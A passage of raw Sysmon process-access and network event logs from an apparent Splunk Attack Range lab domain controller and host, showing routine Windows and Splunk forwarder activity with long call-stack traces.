indows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.140{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.077{466BC892-F54D-60EB-527D-00000000CF01}17244732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000808034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:54.266{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57298-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:55.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F99D4803CB5A71348ED28CF253EC4F51,SHA256=CF1CEE0FA643316AB28D6C9579DC13A9AABEF96625A854A655C3C750127FF898,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001049878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.554{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.538{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 